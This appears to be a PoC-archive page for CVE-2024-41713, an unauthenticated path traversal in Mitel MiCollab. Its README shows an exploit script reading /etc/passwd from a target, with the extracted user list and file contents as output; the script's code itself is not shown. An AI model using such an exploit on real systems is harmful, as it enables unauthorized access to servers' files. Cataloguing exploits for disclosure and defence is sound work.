Goal Reached Thanks to every supporter — we hit 100%!

Goal: 1000 CNY · Raised: 1000 CNY

100.0%

CVE-2024-41713 PoC — Mitel MiCollab 安全漏洞

Source
Associated Vulnerability
Title:Mitel MiCollab 安全漏洞 (CVE-2024-41713)
Description:A vulnerability in the NuPoint Unified Messaging (NPM) component of Mitel MiCollab through 9.8 SP1 FP2 (9.8.1.201) could allow an unauthenticated attacker to conduct a path traversal attack, due to insufficient input validation. A successful exploit could allow unauthorized access, enabling the attacker to view, corrupt, or delete users' data and system configurations.
Description
Mitel MiCollab Authentication Bypass to Arbitrary File Read
Readme
# CVE-2024-41713-PoC-exploit
Mitel MiCollab Authentication Bypass to Arbitrary File Read

```
❯ ./cve-2024-41713-exploit.sh
[*] Exploiting CVE-2024-41713 to read /etc/passwd ...

[+] Extracted users from /etc/passwd:
root
bin
daemon
adm
lp
mail
operator
games
ftp
nobody
```

```
❯ cat debug_response.txt
root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:/sbin/nologin
daemon:x:2:2:daemon:/sbin:/sbin/nologin
adm:x:3:4:adm:/var/adm:/sbin/nologin
lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin
mail:x:8:12:mail:/var/spool/mail:/sbin/nologin
operator:x:11:0:operator:/root:/sbin/nologin
games:x:12:100:games:/usr/games:/sbin/nologin
ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin
nobody:x:99:99:Nobody:/:/sbin/nologin
```
File Snapshot

[4.0K] /data/pocs/db1b25f7a5fd9cca38344071bb452c9a8cb69162 ├── [1.4K] cve-2024-41713-exploit.sh └── [ 716] README.md 0 directories, 2 files
Shenlong Bot has cached this for you
Remarks
    1. It is advised to access via the original source first.
    2. Local POC snapshots are reserved for subscribers — if the original source is unavailable, the local mirror is part of the paid plan.
    3. Mirroring, verifying, and maintaining this POC archive takes ongoing effort, so local snapshots are a paid feature. Your subscription keeps the archive online — thank you for the support. View subscription plans →